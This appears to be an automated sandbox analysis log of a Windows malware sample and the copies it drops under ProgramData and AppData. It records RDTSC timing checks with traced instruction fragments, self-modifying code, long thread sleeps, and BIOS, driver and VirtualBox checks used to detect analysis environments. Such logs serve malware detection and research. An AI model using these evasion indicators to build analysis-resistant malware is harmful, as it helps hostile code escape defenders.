            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 581017F second address: 58101A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 pushad 0x0000000a pushad 0x0000000b mov edx, 5F0773BCh 0x00000010 mov bl, 0Fh 0x00000012 popad 0x00000013 pushad 0x00000014 push esi 0x00000015 pop edx 0x00000016 mov edx, eax 0x00000018 popad 0x00000019 popad 0x0000001a mov esi, dword ptr [ebp+08h] 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 58101A1 second address: 58101A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, di 0x00000007 popad 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 58101A9 second address: 58101C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF158DB3905h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 58101C2 second address: 58101E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF158548891h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub ebx, ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 58101E1 second address: 58101E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 58101E5 second address: 58101EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 58101EB second address: 5810291 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF158DB3901h 0x00000009 adc si, 1E86h 0x0000000e jmp 00007FF158DB3901h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FF158DB3900h 0x0000001a and cx, F928h 0x0000001f jmp 00007FF158DB38FBh 0x00000024 popfd 0x00000025 popad 0x00000026 pop edx 0x00000027 pop eax 0x00000028 test esi, esi 0x0000002a jmp 00007FF158DB3906h 0x0000002f je 00007FF1CA4C9A30h 0x00000035 pushad 0x00000036 movzx eax, dx 0x00000039 pushad 0x0000003a pushad 0x0000003b popad 0x0000003c call 00007FF158DB38FFh 0x00000041 pop eax 0x00000042 popad 0x00000043 popad 0x00000044 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000004b jmp 00007FF158DB38FFh 0x00000050 mov ecx, esi 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 popad 0x00000058 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5810291 second address: 5810295 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5810295 second address: 581029B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 581029B second address: 58102A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 58102A1 second address: 58102A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 58102A5 second address: 581032F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF158548894h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FF1C9C5E96Ah 0x00000011 jmp 00007FF158548890h 0x00000016 test byte ptr [76FB6968h], 00000002h 0x0000001d jmp 00007FF158548890h 0x00000022 jne 00007FF1C9C5E950h 0x00000028 jmp 00007FF158548890h 0x0000002d mov edx, dword ptr [ebp+0Ch] 0x00000030 jmp 00007FF158548890h 0x00000035 xchg eax, ebx 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FF158548897h 0x0000003d rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 581032F second address: 5810383 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 push edx 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FF158DB38FCh 0x00000010 xchg eax, ebx 0x00000011 jmp 00007FF158DB3900h 0x00000016 xchg eax, ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FF158DB38FDh 0x00000020 xor cl, FFFFFFE6h 0x00000023 jmp 00007FF158DB3901h 0x00000028 popfd 0x00000029 mov cx, 2117h 0x0000002d popad 0x0000002e rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5810383 second address: 581039B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF15854888Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d movsx edi, cx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 581039B second address: 5810406 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 512A7B15h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FF158DB3902h 0x0000000f or ecx, 469AE0E8h 0x00000015 jmp 00007FF158DB38FBh 0x0000001a popfd 0x0000001b popad 0x0000001c xchg eax, ebx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FF158DB38FBh 0x00000024 sbb esi, 0824482Eh 0x0000002a jmp 00007FF158DB3909h 0x0000002f popfd 0x00000030 popad 0x00000031 push dword ptr [ebp+14h] 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 mov dx, 758Eh 0x0000003b mov ecx, edi 0x0000003d popad 0x0000003e rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5810406 second address: 581040C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 581040C second address: 5810410 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5810410 second address: 5810429 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+10h] 0x0000000b pushad 0x0000000c call 00007FF15854888Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5810450 second address: 5810454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5810454 second address: 581045A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 581045A second address: 581046C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edi 0x00000005 mov dx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 581046C second address: 5810470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5810470 second address: 5810474 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5810474 second address: 581047A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5871A13 second address: 5871A72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF158DB3907h 0x00000009 sub ecx, 01BA8E1Eh 0x0000000f jmp 00007FF158DB3909h 0x00000014 popfd 0x00000015 movzx eax, di 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f call 00007FF158DB3905h 0x00000024 pop esi 0x00000025 movsx edi, ax 0x00000028 popad 0x00000029 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5871A72 second address: 5871A78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5871A78 second address: 5871A7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5871A7C second address: 5871ADA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007FF158548891h 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 mov esi, 2A431743h 0x00000018 movzx esi, di 0x0000001b popad 0x0000001c push 0000007Fh 0x0000001e jmp 00007FF15854888Bh 0x00000023 push 00000001h 0x00000025 jmp 00007FF158548896h 0x0000002a push dword ptr [ebp+08h] 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FF15854888Ah 0x00000036 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5871ADA second address: 5871ADE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5871ADE second address: 5871AE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5871AE4 second address: 5871AEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5830764 second address: 583077C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF158548894h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 583077C second address: 58307BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF158DB38FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FF158DB3909h 0x00000011 xchg eax, ebp 0x00000012 jmp 00007FF158DB38FEh 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 58307BE second address: 58307C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 58307C2 second address: 58307C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 58106B2 second address: 58106B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 58106B8 second address: 58106DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FF158DB3904h 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 58106DB second address: 58106DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 58106DF second address: 581070D instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF158DB38FDh 0x00000008 or ax, 3FD6h 0x0000000d jmp 00007FF158DB3901h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 mov di, ax 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 581070D second address: 5810728 instructions: 0x00000000 rdtsc 0x00000002 movzx esi, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF158548890h 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5810728 second address: 581075F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 8BD4h 0x00000007 pushfd 0x00000008 jmp 00007FF158DB38FDh 0x0000000d xor ax, B296h 0x00000012 jmp 00007FF158DB3901h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 581075F second address: 5810763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5810763 second address: 5810776 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF158DB38FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5810776 second address: 58107A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 call 00007FF158548890h 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FF158548893h 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 58107A8 second address: 58107AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 58901C9 second address: 58901D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeSpecial instruction interceptor: First address: E5FCA3 instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeSpecial instruction interceptor: First address: 102AC0D instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeSpecial instruction interceptor: First address: 1015D50 instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeSpecial instruction interceptor: First address: 1090E94 instructions caused by: Self-modifying code
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSpecial instruction interceptor: First address: B5FCA3 instructions caused by: Self-modifying code
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSpecial instruction interceptor: First address: D2AC0D instructions caused by: Self-modifying code
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSpecial instruction interceptor: First address: D15D50 instructions caused by: Self-modifying code
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSpecial instruction interceptor: First address: D90E94 instructions caused by: Self-modifying code
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSpecial instruction interceptor: First address: 3FFCA3 instructions caused by: Self-modifying code
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSpecial instruction interceptor: First address: 5CAC0D instructions caused by: Self-modifying code
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSpecial instruction interceptor: First address: 5B5D50 instructions caused by: Self-modifying code
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSpecial instruction interceptor: First address: 630E94 instructions caused by: Self-modifying code
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeCode function: 0_2_058809E9 rdtsc 0_2_058809E9
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeWindow / User API: threadDelayed 1063Jump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeWindow / User API: threadDelayed 1087Jump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeWindow / User API: threadDelayed 1456Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow / User API: threadDelayed 1177Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow / User API: threadDelayed 1173Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow / User API: threadDelayed 781Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow / User API: threadDelayed 1238Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow / User API: threadDelayed 1122Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow / User API: threadDelayed 729Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow / User API: threadDelayed 1242Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow / User API: threadDelayed 1100Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow / User API: threadDelayed 1579Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow / User API: threadDelayed 2054Jump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exe TID: 3808Thread sleep count: 43 > 30Jump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exe TID: 3808Thread sleep time: -86043s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exe TID: 3636Thread sleep count: 43 > 30Jump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exe TID: 3636Thread sleep time: -86043s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exe TID: 7148Thread sleep count: 80 > 30Jump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exe TID: 7148Thread sleep count: 243 > 30Jump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exe TID: 7340Thread sleep count: 234 > 30Jump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exe TID: 5344Thread sleep count: 1063 > 30Jump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exe TID: 5344Thread sleep time: -2127063s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exe TID: 2676Thread sleep count: 1087 > 30Jump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exe TID: 2676Thread sleep time: -2175087s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exe TID: 3992Thread sleep count: 1456 > 30Jump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exe TID: 3992Thread sleep time: -2913456s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7412Thread sleep count: 96 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7412Thread sleep time: -192096s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7384Thread sleep count: 105 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7384Thread sleep time: -210105s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7352Thread sleep count: 1177 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7352Thread sleep time: -118877s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7620Thread sleep count: 1173 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7620Thread sleep count: 781 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7620Thread sleep time: -78100s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7388Thread sleep count: 102 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7388Thread sleep time: -204102s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7396Thread sleep count: 87 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7396Thread sleep time: -174087s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7484Thread sleep count: 78 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7484Thread sleep time: -156078s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7480Thread sleep count: 123 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7480Thread sleep time: -246123s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7360Thread sleep count: 1238 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7360Thread sleep time: -125038s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7616Thread sleep count: 1122 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7616Thread sleep count: 729 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7616Thread sleep time: -72900s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7492Thread sleep count: 101 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7492Thread sleep time: -202101s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7508Thread sleep count: 108 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7508Thread sleep time: -216108s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7504Thread sleep count: 122 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7504Thread sleep time: -244122s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7496Thread sleep count: 137 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7496Thread sleep time: -274137s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7488Thread sleep count: 124 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7488Thread sleep time: -248124s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7692Thread sleep time: -42021s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7680Thread sleep count: 1242 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7680Thread sleep time: -2485242s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7648Thread sleep count: 44 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7648Thread sleep count: 253 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7844Thread sleep count: 253 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7688Thread sleep count: 1100 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7688Thread sleep time: -2201100s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8072Thread sleep count: 32 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8072Thread sleep time: -64032s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8044Thread sleep count: 1579 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8044Thread sleep time: -3159579s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8012Thread sleep count: 269 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8156Thread sleep count: 232 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8052Thread sleep count: 2054 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8052Thread sleep time: -4110054s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8048Thread sleep count: 56 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8048Thread sleep time: -112056s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeLast function: Thread delayed
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeLast function: Thread delayed
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeLast function: Thread delayed
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeLast function: Thread delayed
            Source: RageMP131.exe, RageMP131.exe, 0000000B.00000002.4147307095.0000000000585000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
